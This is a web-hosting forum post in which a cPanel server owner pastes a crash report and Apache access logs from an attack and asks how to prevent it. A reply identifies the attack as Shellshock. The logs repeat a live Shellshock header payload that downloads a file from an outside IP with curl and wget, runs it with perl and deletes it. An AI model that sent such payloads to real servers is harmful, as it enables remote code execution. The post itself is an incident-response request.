Whm - Cpanel script security folder tmp.
Hello. this morning my server is down and i received this email from my server :
(XXXXX = my user server)
Object : [abrt] full crash report
After i had restar server and into file /home/xxxx/access-logs/xxxxx.com i found this Request
Then i fount file ppp.jpg into my tmp folder. I removed all. Do I prevent this malware? How can i do? Thank
abrt_version: 2.0.8
cmdline: /bin/sh php4
executable: /bin/bash
kernel: 2.6.32-220.13.1.el6.x86_64
pid: 19131
pwd: /usr/local/cpanel/cgi-sys
reason: Process /bin/bash was killed by signal 11 (SIGSEGV)
time: Tue 07 Apr 2015 04:10:02 AM CEST
uid: 507
username: XXXXXX
sosreport.tar.xz: Binary file, 1777664 bytes
environ:
:PATH=/usr/local/bin:/usr/bin:/bin
:HTTP_HOST=XXXXXX.COM
:HTTP_CONNECTION=keep-alive
:HTTP_CACHE_CONTROL=max-age=0
:HTTP_USER_AGENT
:'() { :;}; /bin/bash -c \"echo xxxxxx.COM/cgi-sys/php4 ;cd /tmp;curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg; echo xxxxxx.COM/cgi-sys/php4 ;cd /var/spool/samba; curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg\"'
:'HTTP_COOKIE=() { :;}; /bin/bash -c \"echo xxxxxxx.COM/cgi-sys/php4 ;cd /tmp;curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg; echo xxxxxx.COM/cgi-sys/php4 ;cd /var/spool/samba; curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg\"'
:'HTTP_REFERER=() { :;}; /bin/bash -c \"echo xxxxxx.COM/cgi-sys/php4 ;cd /tmp;curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg; echo xxxxxxx.COM/cgi-sys/php4 ;cd /var/spool/samba; curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg\"'
:HTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
:HTTP_ACCEPT_LANGUAGE=en-US,en;q=0.8
:SERVER_SIGNATURE=
:'SERVER_SOFTWARE=Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4'
:SERVER_NAME=xxxxxx.com
:SERVER_ADDR=myip
:SERVER_PORT=80
:REMOTE_ADDR=62.149.164.193
:DOCUMENT_ROOT=/home/xxxxxxx/public_html
:SERVER_ADMIN=webmaster@xxxxxxx.com
:SCRIPT_FILENAME=/usr/local/cpanel/cgi-sys/php4
:REMOTE_PORT=51684
:GATEWAY_INTERFACE=CGI/1.1
:SERVER_PROTOCOL=HTTP/1.1
:REQUEST_METHOD=GET
:QUERY_STRING=
:REQUEST_URI=/cgi-sys/php4
:SCRIPT_NAME=/cgi-sys/php4
limits:
:Limit Soft Limit Hard Limit Units
:Max cpu time unlimited unlimited seconds
:Max file size unlimited unlimited bytes
:Max data size unlimited unlimited bytes
:Max stack size 10485760 unlimited bytes
:Max core file size 0 unlimited bytes
:Max resident set unlimited unlimited bytes
:Max processes 62776 62776 processes
:Max open files 16384 16384 files
:Max locked memory 65536 65536 bytes
:Max address space unlimited unlimited bytes
:Max file locks unlimited unlimited locks
:Max pending signals 62776 62776 signals
:Max msgqueue size 819200 819200 bytes
:Max nice priority 0 0
:Max realtime priority 0 0
:Max realtime timeout unlimited unlimited us
maps:
:00400000-004d4000 r-xp 00000000 fd:00 3407921 /bin/bash
:006d3000-006dd000 rw-p 000d3000 fd:00 3407921 /bin/bash
:006dd000-006e2000 rw-p 00000000 00:00 0
:008dc000-008e5000 rw-p 000dc000 fd:00 3407921 /bin/bash
:0210e000-0212f000 rw-p 00000000 00:00 0 [heap]
:333d800000-333d820000 r-xp 00000000 fd:00 655418 /lib64/ld-2.12.so
:333da1f000-333da20000 r--p 0001f000 fd:00 655418 /lib64/ld-2.12.so
:333da20000-333da21000 rw-p 00020000 fd:00 655418 /lib64/ld-2.12.so
:333da21000-333da22000 rw-p 00000000 00:00 0
:333dc00000-333dd89000 r-xp 00000000 fd:00 655456 /lib64/libc-2.12.so
:333dd89000-333df88000 ---p 00189000 fd:00 655456 /lib64/libc-2.12.so
:333df88000-333df8c000 r--p 00188000 fd:00 655456 /lib64/libc-2.12.so
:333df8c000-333df8d000 rw-p 0018c000 fd:00 655456 /lib64/libc-2.12.so
:333df8d000-333df92000 rw-p 00000000 00:00 0
:333e400000-333e402000 r-xp 00000000 fd:00 655645 /lib64/libdl-2.12.so
:333e402000-333e602000 ---p 00002000 fd:00 655645 /lib64/libdl-2.12.so
:333e602000-333e603000 r--p 00002000 fd:00 655645 /lib64/libdl-2.12.so
:333e603000-333e604000 rw-p 00003000 fd:00 655645 /lib64/libdl-2.12.so
:3340c00000-3340c1d000 r-xp 00000000 fd:00 655748 /lib64/libtinfo.so.5.7
:3340c1d000-3340e1d000 ---p 0001d000 fd:00 655748 /lib64/libtinfo.so.5.7
:3340e1d000-3340e21000 rw-p 0001d000 fd:00 655748 /lib64/libtinfo.so.5.7
:7fdfa080b000-7fdfa080e000 rw-p 00000000 00:00 0
:7fdfa0820000-7fdfa0821000 rw-p 00000000 00:00 0
:7fffc1456000-7fffc146b000 rw-p 00000000 00:00 0 [stack]
:7fffc1550000-7fffc1551000 r-xp 00000000 00:00 0 [vdso]
:ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
open_fds:
:0:pipe:[121610173]
:pos: 0
:flags: 00
:1:pipe:[121610174]
:pos: 0
:flags: 01
:2:pipe:[121610175]
:pos: 0
:flags: 01
After i had restar server and into file /home/xxxx/access-logs/xxxxx.com i found this Request
62.149.164.193 - - [07/Apr/2015:04:08:07 +0200] "GET /cgi-sys/php4 HTTP/1.1" 500 - "() { :;}; /bin/bash -c \"echo xxxxx.COM/cgi-sys/php4 ;cd /tmp;curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg; echo xxxxx.COM/cgi-sys/php4 ;cd /var/spool/samba; curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg\"" "() { :;}; /bin/bash -c \"echo xxxx.COM/cgi-sys/php4 ;cd /tmp;curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg; echo xxxxx.COM/cgi-sys/php4 ;cd /var/spool/samba; curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg\""
62.149.164.193 - - [07/Apr/2015:04:07:43 +0200] "GET /cgi-bin/test-cgi HTTP/1.1" 500 - "() { :;}; /bin/bash -c \"echo xxxxxx.COM/cgi-bin/test-cgi ;cd /tmp;curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg; echo xxxxx.COM/cgi-bin/test-cgi ;cd /var/spool/samba; curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg\"" "() { :;}; /bin/bash -c \"echo xxxxx.COM/cgi-bin/test-cgi ;cd /tmp;curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg; echo xxxxx.COM/cgi-bin/test-cgi ;cd /var/spool/samba; curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg\""
62.149.164.193 - - [07/Apr/2015:04:07:19 +0200] "GET /phppath/cgi_wrapper? HTTP/1.1" 500 - "() { :;}; /bin/bash -c \"echo xxxxx.COM/phppath/cgi_wrapper? ;cd /tmp;curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg; echo xxxxx.COM/phppath/cgi_wrapper? ;cd /var/spool/samba; curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg\"" "() { :;}; /bin/bash -c \"echo xxxxx.COM/phppath/cgi_wrapper? ;cd /tmp;curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg; echo xxxxx.COM/phppath/cgi_wrapper? ;cd /var/spool/samba; curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg\""Then i fount file ppp.jpg into my tmp folder. I removed all. Do I prevent this malware? How can i do? Thank
-
Hello. I find the problem. This attack is call Shellshock. I solved the problem and fix the system Bug. ausweb.com.au/tutorials/2014/09/26/check-linux-server-vulnerable-shellshock/ 0
Please sign in to leave a comment.
Comments
2 comments